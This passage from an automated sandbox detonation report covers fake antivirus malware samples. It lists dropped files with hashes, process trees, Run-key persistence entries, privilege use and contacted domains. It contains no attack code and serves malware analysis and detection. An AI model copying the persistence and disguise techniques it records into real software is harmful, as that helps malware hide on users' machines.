SHA512 36337d24bc7a06508c719d3104b84510d649fa37ec4d2edaac12bda8a8ed2bc370f2923bffc185932af2868e189fde160fb1e95dfc9e1e88c06c8ea2bbd13dcd

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c9ce59b1e3ee8b75017e9a71f4df4fde
SHA1 5e0cfc36216696b394c10d043d914b95b0ac9506
SHA256 a73cb08ae5a7408d0fd322cb3ba096276a3c2db4f35fba5796692fc62cbe413c
SHA512 2b2463c9685172837b5e1d55f3d85c42b153e2db3b9c020f19b104d34540a96162e645809e68cb082e3047df7a2299acedd37572a40f6c13fbe2ffc66f83987b

C:\Users\Admin\AppData\Roaming\Internet Security Guard\cookies.sqlite

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 614640314f320e667f14c1899746a503
SHA1 df2fd4a0379368f4456c8c7e910affd667d01b84
SHA256 a1e76dbb882c6f57c5ab01a5335b38a2de49e1e7a396ec74f10ca1ef52b6ce6d
SHA512 11f8877faaae439d6c8bd3520644dd5c11104b6b4c42c506e0ff11f63d63a1acd933f09cf6ec4c85b0586ebbc63288cc4aa8690f6150d4c01e69bbbe75f98820

C:\ProgramData\8b93e\IS978.exe

MD5 fe7c10448a5cc17a65029be6a71bd190
SHA1 e1767d3163388f2d74f89475f237f55154c22135
SHA256 aa350ca50c1656d06182bb60a2bad3f749225ba6ccbd841680c211bd756eefad
SHA512 313ae00c9504e395836e38e15bc3d3b9bcd408faf936fc1a9fde641aac302f49b0d8dc5d1e3546a7e35fe3ddabfbe193314fbaed9f96f268e5fcd4b696099e0e

C:\Users\Admin\AppData\Local\Temp\Fake AV\5781.mof

MD5 3754f8f8abad5bad797085d0717a9766
SHA1 48d92f36cb721b390e216aa03b27b41f25c563fc
SHA256 3c77f5f888d417a7a31284cb8c5e3bdb4d926c4a274cecac8a8b2920659d5927
SHA512 c59f322ece53c757767e52fe9bfbc3526a13afe9ec7503e3d1cae683eeb55cbb808a1bce720fd58f97f286756d314124bcf797c2167275e08ed93ba759bf3985

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 3478a0b0d29081b3dd28481a9437226a
SHA1 22f00dc21f300026431d716e3cc96ff7b1fd2c33
SHA256 b9d10d67574441c9fe5804b0c48c8b4b3829f3ddf9c6913febaf4d177211eb08
SHA512 33b6b700ddcad993dc79f4f9ace5a31556c7dc5cda43dc283331b2b2fcb4da6ede3a8874f77e6e64e48d828996137773f0b7c9ef025f3af247a76771376b1feb

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 98c56cc5a5ad2768f9c2de15ae05bce0
SHA1 ba6024976a446be70e500bc4318df2ba57b40624
SHA256 7f10dcf6013b5696925c9d613893b7c7e8023be95a35d4edd563594a556c142e
SHA512 6c4942eec234ad7276dacecf019da20df83f8ac535cc1e2b656e01468c06434cc69504c0fbb16d7dc0757d65fb076c7cf9d1586808b9bede9af8bd0b9203a3e2

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c27a57f000ebaa707932db0f7821c77f
SHA1 2f94ae38c56aaa32b5566bf7073ce0b1b3eb159e
SHA256 cb96d05337897d60ca9628c1f6f69e67e2b784818ff1dec24f229aca1b03d466
SHA512 b39b3c4f3e5dabf5440adb0eae1335f4f070c61d827695bb6d7edfbd817a9bcbc28f3fb6b96ed3f178c5111f8e0bb6f7f837feea56c2021cbb2e7319f2ff6b9c

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 24e7829c023f5ee044e40ad9e2cf5f1a
SHA1 b7cc75068765a450f112230f08b577bb25630da6
SHA256 54ef66c9894b0423e30105628a767e6b422fb0c02be614e0cbc3a2ec1851654a
SHA512 a6f7f02a522035039c3107e1ef2c79687106a92d14339f595e3fdba7da6fde960ec948e495d35154c7a07850acaa1c951fc0bf640860f8e1a8bc34af57840aed

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 d06c0de9604e2e2c45c42a82a2b8e333
SHA1 c2893e549458c48b0a5b4ebe07ae794b725d23dd
SHA256 e841a98e62047dd9d21be1d6afd524eb662f627f692df28ea14d24275ab9def2
SHA512 c2bd03533d618e91da41959858997d5627c5bd9ea65113de178552b5a3fd1a3e7963ea3bf141b4c2fa615a2a0df3bfa0d57c186aabce36a5b57afc507720a70f

memory/64-423-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 07d20e95c2a5ea8b2dd526dc80584a10
SHA1 cb3b943b0600fc4cbce9fc13874946f46eb933e7
SHA256 e7bbf018c2877d81007346c0796d10db12cabdf3aba7be4656cd8cff9088d208
SHA512 26a5c9fdb296d54c025a82689fa7a240c4928d7bcd259933f7294e6c499dc3bdf2ac3f3a30815c55910031cebb9776ab36df31f48bb45c6d26b4057f3dc262ff

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 06363b1a2562d3102f04ef94b71416de
SHA1 9cfc40ac33dcad09bf3addd5ce7165ec24f7bd11
SHA256 30c5b9b48d4d3aac91cfe829c14514a8a9a0a3621802891373e011170fe3c7f4
SHA512 908dc915aa528761326397dee3fea768ea5c974d4716a95be0e0f928576596cd4cd47700cce5977eb63232fd8fe5c313acda08b88c8ba2d75eea90351fd9f7f5

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 d9dc368d346defd69187a472d34a4134
SHA1 f11aa565121623f552a211140ed663e85060f182
SHA256 bedfee0f41b9aa0c9b1767c0b6ae5b73a25775c6e4246b4f1dce712cc715e542
SHA512 0e95b7000876086005f8cd1ad43646e68d5372c467a6f427a6ee585f9584c3e3f701207e63dde04354cdd816abe6a6fedb1d0669f88fd29014ed8ad73db0f0f8

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 b466d4fd4a5fe76a26effe5004f0ef21
SHA1 4b0a2a478ffab1b2b4a0082fd9578bfba01f4c5c
SHA256 ab14a6ff8c11cecec6a84ca69f0c12a26224468a3e695573d8bb7952f56724e6
SHA512 10c85255a79d9490896bace5bc5c8425159ca273c481c9ecf11083670838f4cd2e2a8e68ec1f040848350c314fb68adffba33c9d03307152acba651ba139ce16

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 0d5c00ef7eae233c849b23bef8727676
SHA1 0424ba73bad0e3f291a90fec3bb86bc20a776a9f
SHA256 377008d751f87732ca02182456b5d767e1c2b391a426b53106d3dd028530ebec
SHA512 2f76da17e4357f3b5b5428de88e936e674a6c5d0a13e9e49fa7c4436ddef1f5c31ab31dd65fd33e63c22336c82f63af450ff6ab1a1f313af4a0a052325ee9c35

memory/64-484-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-485-0x00000000023F0000-0x00000000023F1000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 5ec1eb1ab2e0b62ad1cd97956bae8dce
SHA1 be9e327e45409ae795a69cc9e50a4c5bb4049814
SHA256 d4433e694eccb96fa4ce9dd82f00f4d29512c33ca7a6e06d55592d757a1a99ac
SHA512 cab651763361e49b5d03198bbeaee8df6ab5aa6dced4e9f43a65a5104fb9cf0b7d19b9cc4ff93c24b6fadc4ee27415cd32c1b8a5aa568cfdaa4bc478a5781340

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 c7b227048219ac5811bc2f777e879a8d
SHA1 c264c74ff88210fb88ea8c5c947b96220f2e4a07
SHA256 4a9a735a12405b0fe4c1fbcb38d1f57808ac0386167d3024eaff850d0fe4ee83
SHA512 853f5bae6f7049a7802d23617a4b2c68d64dacdcd3ef4754ac8f06f52bf4046a0613450b2b2149d4d16d0515461511d87fbb2b6a301317cc1f304598959d3670

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 2df5ad84c45badf1e03bd68bf95eb86c
SHA1 1c6eef307c6aa4bdf578073ae71a77004f68d31b
SHA256 655196e91302a5d6deb266cede4a6b193f6175a79a9b463c0ce26bacbbe2b040
SHA512 e90f3223081876419f51efe4733d581bff73c36bc876c9e60cb259892c9a43e0eb226a0b5fd89b89dd22cf1eacd208ac2afe05b8bdf63a5dd91a84228ff88f5c

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 0d9645e24c9b3dcc429ece0db44e2136
SHA1 67b2dc6dbd4b452a32eb080db0f1d7da068422a5
SHA256 4b35e346498774a434fd8f0d7db0c23adcb33c582d39e3c97e76e6f93eb90d17
SHA512 c8710ed57982f47713a70e1743fd4ac4362d19a3392f0f5c8b0cae3673814f88f16d9493e3f16c6f45b4d027c9a6e9597480f18257bb2e07136d0596d1d8d69f

memory/64-535-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 63c3c1816d205ef6a895a020c603fb4f
SHA1 eb57e0176ac506bff77a9dddc4bf8aef7bc308d2
SHA256 91b0b9b7ec6bbed884331231a21581b7eb30aa4ebaebf70ec8e9a666dedc2557
SHA512 43eedaf7b0b7a12043650705b465ddf0d5c23604dcc084603ae1de3295fabdd8f9ef0d1bfa0b8dec75647de18aacd7a6f9c86934a12f04d98a89f8cd6bf133fc

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 61e9ea70910e91d7232e04fe83ba7a6d
SHA1 d21edcbaeee79549f05c3db4b33ed2414c000fba
SHA256 2f9346e228a51813dc895e2fcf679d9894c0739dfdb5e88fdc16c59c68fd5c26
SHA512 2dcb38005f3c6d204d85756f892f53aedcc90ad75ae3b49aa8fb5124cf3eb6389648a871e8ce838dc15b558e3c7ffa3fccd1231d6cbea7bfe6c659aa14b6892e

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 3129f839d59c5f3d3cd267817f27d292
SHA1 3101a3593fa865290ec4c1310ba37368e3ffc8c0
SHA256 c6004eb98e8c34e2fa1dc136ccfbf366c897f1226ccc0649e9b6be6f3741b525
SHA512 e10855220fde90204b3f93e274b9c75b70a26c8cca2ac04459babd7bca7de35369dc12328b7270038a8c6a7d279e24edc2528a655c25fbdeac6b8c633aa99b7f

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 aba755f7b4d32732e06ec35015f92024
SHA1 f3a016dcdfe7c59ddad18fa8223c854444094f55
SHA256 e3b99bb6692ffcb94545f34ff49b054deeb9f455f75e0694306699b1316d7afb
SHA512 a3e2a7913d69565cc7e31ba10c56cf996b6bbd439c0a449854d39990b5ae493bfbd3d2455155a8d16d466f01fee0b39818d160ffe8768278168e07e8f7ca1219

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 8643c4e4da3fc60067945b37eb42bc04
SHA1 1c6ce62ac6e39f88a08e07641b4a4e91eba54648
SHA256 3979a8da68d0a6ded406bfd28b4d674d5d1006485ffeb37069064e280f46b237
SHA512 479910d0dafa6a45735b24f61d9469bec108a4b90f29c7c63655b9d2633fa7a489123cc30520ec3b195f562bde9bd603651acd33ff9404a1220ecdf7edb7a0fc

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 538264467013e1dec74f79c771b02ad5
SHA1 e6b77af6c639972c9ab7454b30f5af82b6a94979
SHA256 2340db009847570b9e450cff93337eedf42b1d98b3c37c9b5505ef0bead7ebc2
SHA512 e1a1b9e34bf48ea421d4872f69f453a220d1a4db77b6ef3c0e700bb13000042709201eab2aa3b523243f9433eeef3fe26432e88e2d7b7ab943d8263dbf11acd4

memory/64-607-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-609-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-611-0x0000000013140000-0x0000000013764000-memory.dmp

C:\ProgramData\ISQWJXXKWG\ISVDHG.cfg

MD5 d6b6ca70350c95f725f3ac8246d19809
SHA1 b9055b5232e1c60a57d35b79ecd13ca71348b46c
SHA256 e305e08757de10965c96651bdcbc89b961f2af2fee089546b6a672ece7373573
SHA512 eabb4fe5a79a3e2c476259b9bc1b9cdb47359e403c219f09a5b71276d40fdc7cfdeed97c16c91234f487cd36418c089a90a910093268b7ca494acdb7f1f8742f

memory/64-615-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-618-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-619-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-620-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-621-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-622-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-623-0x0000000013140000-0x0000000013764000-memory.dmp

memory/64-624-0x0000000013140000-0x0000000013764000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

92s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Movie.mpeg.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2884 -ip 2884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 588

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
IE 52.111.236.21:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp

Files

memory/2884-0-0x00000000006B0000-0x00000000006B1000-memory.dmp

memory/2884-1-0x0000000001000000-0x00000000010CE000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaBridge.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaDebugger.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NavaShield = "c:\\Nava Labs\\Nava Shield\\navashield.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Nava Labs\Nava Shield\NavaShield.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

C:\Nava Labs\Nava Shield\NavaShield.exe

"C:\Nava Labs\Nava Shield\NavaShield.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x514 0x510

C:\Nava Labs\Nava Shield\NavaBridge.exe

"C:\Nava Labs\Nava Shield\NavaBridge.exe"

C:\Nava Labs\Nava Shield\NavaDebugger.exe

"C:\Nava Labs\Nava Shield\NavaDebugger.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 navashield.com udp
DE 64.190.63.222:80 navashield.com tcp
US 8.8.8.8:53 222.63.190.64.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp

Files

memory/1264-11-0x0000000000400000-0x000000000047A000-memory.dmp

C:\Nava Labs\Nava Shield\NavaDebugger Libs\MD5.dll

MD5 831295342c47b770bf7cc591a6916fa7
SHA1 2c9063fbf3f3363526abdc241bf90618b82446d1
SHA256 8341ecc0938ca6d90b7e0f02af2d7e6b571c948a03a99d54af61c4557c78d656
SHA512 01419defe963a987989cddb0e21cf651ec3eefeae97cf4b257d4caa8da26436a647e8e4d95cdad22bbb0657171f6d3d9c41dc6fb217ffc7d5172ebc9a409d36e

C:\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 404501846c15ee0774025ded425d4707
SHA1 87c4af4698aa2294b53fe4c6349ff552cfa38356
SHA256 660cc09f9d69a1ff879a811b765e1fa898081019d029d77cf833a9a915ae9873
SHA512 4bbb20aea92140c1057e9131141a543c0d3bf46578f92a0b2fc8448b4b8fc106b98a5d44212f6c197d1ec77dbac32d7cb21935fcc72ef31b339c5b8e3080dec6

C:\Nava Labs\Nava Shield\NavaShield Libs\Internet Encodings.dll

MD5 de5eefa1b686e3d32e3ae265392492bd
SHA1 7b37b0ac1061366bf1a7f267392ebc0d606bb3db
SHA256 a50e56dfb68410a7927ecd50f55044756b54868e920e462671162d1961bfe744
SHA512 c71270a5275f91214444449be4923a70243a9e2cd06afcc6fd28ab9f2cd2d930219ce8ed9ec008750b2611b62ed26b65cb57a75c6035201cd9657263d157d508

C:\Users\Admin\AppData\Local\Temp\$inst\0001.tmp

MD5 4fe19c390d4cbaaa6faae51a9131923c
SHA1 a3c114ab35f37b0444939ae479ed33a3a5ee6f13
SHA256 b95cbd2158693bbd3cefedfdc40cf4acae63883fa17ec4e9f8a38fb7b4593c1b
SHA512 a7ea9145e9dfeb36adc13bdb2ccc286ab946a219899cb25b384e3788a90b43ee40c88584c64cbb77de074b8ff92fb8db9bd2b68af47b0a11d779c96bc154f24d

C:\Nava Labs\Nava Shield\NavaShield.exe

MD5 310ee3a3e78d0b21e6e09225a80f6cc0
SHA1 b0e1cd52ef63f0ad14049fc4237875794c4f5ecc
SHA256 20201d9a8462d9b26908b6482044610c7e1551f0b8e981cae20c2510af0ed12b
SHA512 dc6112b43cad6fc13b8976c833231e38809880a966ae544803c0499257e78289b265c0b27d901e2593b554c366eb1cf3372033ab1ca3f492ab81fc52a062d8d8

C:\Nava Labs\Nava Shield\NavaShield.exe

MD5 69f41559fca633978b2bd4032b5c0a49
SHA1 5fcf9c203b39a7e0ee2a9c92541149310cbe20fa
SHA256 7d95aa92c14e385bc35087e143a3bff894c34974da1310c9c5cc9ec4ea17e82c
SHA512 e1945fe0db154b5ad6e1e707b89dfd3f1f1d3191d618c8be549e5a7d9ee13bcd1b7a69f8a1f916b9588b756f0e78f19c89df39d99c709e8325c08af55e580744

memory/1264-110-0x0000000000400000-0x000000000047A000-memory.dmp

memory/4656-117-0x00000000026A0000-0x00000000029BB000-memory.dmp

memory/4656-116-0x0000000003E30000-0x0000000003E42000-memory.dmp

memory/4656-121-0x0000000003E60000-0x0000000003E7A000-memory.dmp

C:\Nava Labs\Nava Shield\config.dat

MD5 b0f4924346d2daa81a9f7d241a987d6c
SHA1 190356e26e8054f338d1f4b6a4e582e02149f7fa
SHA256 da4728e17ae412494f6b548e21b136fbb830abc4a2bac5fd7c1522a2a729271c
SHA512 8eddb6eaf687aa5cb4bbdf3f0914e401dd42c488f8d68243d705608197006ee09195d39f80b6ff5b878be4e18238297bf1a38e60d82b72e3f53c7a998a8e1e1e

C:\Nava Labs\Nava Shield\NavaMod.dll

MD5 3d7f80fb0534d24f95ee377c40b72fb3
SHA1 11b443ed953dae35d9c9905b5bbeb309049f3d36
SHA256 abd84867d63a5449101b7171b1cc3907c44d7d327ea97d45b22a1015cc3af4dc
SHA512 7fc741bbce281873134b9f4d68b74ae04daf943ea4c0c26e7e44579f2d51883c635972a405dd81cee63079a5ba9d09328a1e26e7878547590569806d219d83c7

C:\Nava Labs\Nava Shield\NavaShield Libs\Appearance Pak.dll

MD5 fcf3ac25f11ba7e8b31c4baf1910f7a6
SHA1 fb470541f0b6b8f3ce69dcaa239ca9a7d7e91d72
SHA256 e5b3249fbeea8395fd56c20511bfcfdb2b2632d3c8d517b943466a4e47f97b5c
SHA512 47c467924d64af4a48a6e640778aca1dce379d16b06bf3f60a44025034c15ce1498ef307b63cb04e5c0cbb6c2ac58022acdb0d6efb1109c5ea31f842a320aa40

memory/1264-130-0x0000000000400000-0x000000000047A000-memory.dmp

memory/4656-135-0x0000000069F80000-0x0000000069F88000-memory.dmp

C:\Nava Labs\Nava Shield\NavaBridge.exe

MD5 903a4e6e78dc62bc7b9e261ff3cce399
SHA1 a6a9ae0572ab0ed14cb62441f1f1ed0d3b52d926
SHA256 0d12740248a3849bc5f92134502a95dc413fcd6be25fa6893b1c05f920ed2cb7
SHA512 31b9fb9bdaa78c18276f1d1da93ce099b19437f1fb27f0e4b0f49b82881aff40bc7d610ba755283461a6fd9c20dc669b86ff453e6b52f4633a38177bb6b89daf

C:\Nava Labs\Nava Shield\NavaBridge.exe

MD5 8c54a7f80cc21f50908023844bd88a77
SHA1 cf0f590a1c93356b77358d56311578b75b98cc57
SHA256 3bf536a387ce91a81936b4f3bb1df34d19e80b22e98c08e7b87b757075ebac67
SHA512 5e45edcb0c9c76e1c4b8ad52a2da899547416f69a3f931c04c439b2d447ce5d2fad40ea5a389645a225eb32086b65c91d37b778c6ace0764ff26d95f9f231e1f

memory/2580-141-0x00000000025B0000-0x000000000273B000-memory.dmp

C:\Nava Labs\Nava Shield\bridge.dat

MD5 e66f1107f995d52bcd90421b3cdc0dde
SHA1 245acafa2f3dab3f2b7f183d34267dcd976199c0
SHA256 45fa6eacea58e682c2ef2bb9e888cb6bf396c37b957fd144ca73c95699ad3c74
SHA512 0500f9dec5cfdfb80bc5763943deb3111ccde4b35f19ac124df2e5abde2681154977f160a42e9ef50698b0ea0cc26fc09361a3917534038f141dd047f0287c1f

C:\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 bc379ff85e4b9b5886f7416d7e1014be
SHA1 f74a8db0c0c2b19ded9b22ed8ea2183388845d08
SHA256 84040973247c112d18ccf5495311df65f2bbe6b98c464cb2562549d03e8ad0ec
SHA512 95fb614a24be346c43acf572eed58a46defb4017f771453d83bfdb820f17f4ff1855d6f2c2b6822bf3f939f9bc7743adf81366e315aaf7e2816a6e5abccd668a

memory/2580-151-0x0000000002960000-0x000000000297A000-memory.dmp

memory/380-154-0x0000000002600000-0x0000000002787000-memory.dmp

C:\Nava Labs\Nava Shield\navig.dat

MD5 0bf850cb9d0aa0f4c778cc515b79bd13
SHA1 c0cb8a58cba046d2c7539025a39c8a1af81c3914
SHA256 9c4723ecb77e39e58eda9c60f532724aa3bf69de30047cc7b6522534cd423f00
SHA512 649c13f9f4fccc03ebd6cb2c3752434c69b5a8d7e9b94cac80cd98a7624bfd00648949b18cd720faf89fae050f6b523221db589a550c6ce4513e76ff0895da5b

memory/2580-147-0x0000000002940000-0x0000000002952000-memory.dmp

C:\Nava Labs\Nava Shield\NavaBridge Libs\Browser Plugin.dll

MD5 912924f628e277be9cc28a5f2a990cb9
SHA1 13c0166469a271497043a2f13e9a6a610dc2b336
SHA256 bd474c5aafcaa12f20da5ecb29e17555b953eca46b4f56588a72672a36d4a8eb
SHA512 b33b430254f9ec32ecd6224124db69af93de3cbfbaf422a0045641f7961834a67cba1b9fd97f4e0e903e27e3360301c5dba214a6b9156c4cdf8a25115b860c39

C:\Nava Labs\Nava Shield\config.dat

MD5 3cad4610cca4159318a0e77632d3ef08
SHA1 e0d3c55b5992744e5b7d938873c682601a461fc1
SHA256 8adfe6ddd57f59595cb026b09726b3146fc59b8f28183146cdd46e499d0ad527
SHA512 37034028fc483d1b3bdeea24574c1113c0fca858f09e4bf4c3aa5ffce0a3016997dc559d4b8f4b5f66be415dba9539ce4d06e05ba6c83ac1609a71aba5039c01

Analysis: behavioral15

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

121s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.vikingwebscanner.com udp

Files

\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/1928-6-0x0000000000970000-0x000000000099E000-memory.dmp

memory/1928-7-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

memory/1928-8-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-9-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-10-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-11-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-12-0x000000001ADC0000-0x000000001AE40000-memory.dmp

memory/1928-13-0x000007FEF5EA0000-0x000007FEF688C000-memory.dmp

memory/1928-14-0x000000001ADC0000-0x000000001AE40000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FakeAdwCleaner.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
